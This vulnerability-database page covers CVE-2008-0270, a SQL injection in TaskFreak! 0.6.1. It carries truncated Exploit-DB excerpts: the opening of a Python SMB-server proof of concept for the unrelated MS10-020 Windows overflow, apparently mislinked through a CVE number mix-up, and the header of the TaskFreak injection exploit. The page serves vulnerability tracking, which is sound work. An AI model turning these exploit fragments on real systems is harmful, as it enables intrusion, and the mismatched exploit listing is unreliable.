CVE-2008-0270
Published 2008-01-15
Priority P432 · medium · 6 (CVSS 2.0)
Vector: AV:N/AC:M/Au:S/C:P/I:P/A:P
EXPLOIT
EPSS: 0.84% (53.3th percentile)
SQL injection vulnerability in index.php in TaskFreak! 0.6.1 and earlier allows remote authenticated users to execute arbitrary SQL commands via the sContext parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| taskfreak | taskfreak | <= 0.6.1 | — |
No detection rules found.
Exploit-DB
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)
exploitdb·2010-04-17·CVSS 9.0
CVE-2010-0477 [CRITICAL] Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)
---
import sys,SocketServer
# Windows 7/2008R2 SMB Client Trans2 stack overflow (MS10-020)
# Date: 17/04/10
# Author: Laurent Gaffié
# Tested on: Windows 7/2008R2
# CVE: CVE-2010-0270
# Full advisory: http://seclists.org/fulldisclosure/2010/Apr/201
# More information: http://g-laurent.blogspot.com/2010/04/ms10-020.html
#
# Note from Exploit-DB: It has been reported to us that CVE-2010-0020 also applies
#
EBP = "\x42\x42\x42\x42"
EIP = "\x41\x41\x41\x41"
packetnego = (
"\x00\x00\x00\x55"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x98\x53\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
"\x11\x05\x00\x03\x0a\x00\x01\x00\x04\x11\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\xf
Exploit-DB
TaskFreak! 0.6.1 - SQL Injection
exploitdb·2008-01-12
CVE-2008-0270 TaskFreak! 0.6.1 - SQL Injection
---
# TheDefaced.org
# TheDefaced Security Team Presents An 0-day.
# TaskFreak! SQL Injection
# Product: #
# TaskFreak!/Discovered in addWhere('context = \''.$pContext.'\''); #
# $pLink=Tzn::concatUrl($pLink,'sContex
No writeups or analysis indexed.
References:
http://secunia.com/advisories/28448
http://www.securityfocus.com/bid/27257
https://exchange.xforce.ibmcloud.com/vulnerabilities/39645
https://www.exploit-db.com/exploits/4899
Published: 2008-01-15